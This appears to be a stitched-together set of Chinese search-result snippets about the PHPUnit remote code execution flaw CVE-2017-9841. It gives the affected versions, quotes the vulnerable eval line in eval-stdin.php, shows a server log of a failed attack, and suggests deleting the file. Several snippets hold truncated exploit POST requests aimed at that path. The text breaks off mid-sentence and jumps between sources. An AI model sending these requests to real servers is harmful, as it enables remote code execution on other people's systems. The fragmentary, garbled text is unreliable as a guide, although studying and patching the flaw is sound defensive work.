今天复现phpunit 远程代码执行漏洞(CVE-2017-9841),Composer 是PHP 的包管理工具,安装扩展时会在当前目录创建 vendor 文件夹,建议将其放在 Web 根目录外以避免直接访问。PHPUnit 的 4.8.19 ~ 4.8.27 和 5.0.10 ~ 5.6.2 版本中,vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 包含风险代码: ...
这个漏洞位于 vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 文件中,具体原因是该文件中的以下代码行: php eval('?>'.file_get_contents('php://input')); 这段代码使用了 eval 函数来执行从 php://input 流中读取的代码。如果 eval-stdin.php 文件被暴露在 Web 可访问的目录中,攻击者就...
发现,nginx的请求报错日志(error.log)有很多,都是同一个错误,查询同一时间段的访问access.log日志时发现是: [01/Jun/2023:18:16:21 +0800] “POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1” 404 47 “-” “PostmanRuntime/7.32.2” 还好都是请求失败的. 查看phpunit/phpunit安装...
总体来说就是向vendor/phpunit/src/Util/PHP/eval-stdin.php发送POST请求执行php代码 直接把这个文件删了就行
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.phpA HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accep...
问由于phpunit恶意文件eval-stdin.php,cpanel上的80端口被阻止EN作者:13 GitHub:https://github.com...
直接将PHP代码作为POST Body发送给http://your-ip:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html...
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.phpA HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accep...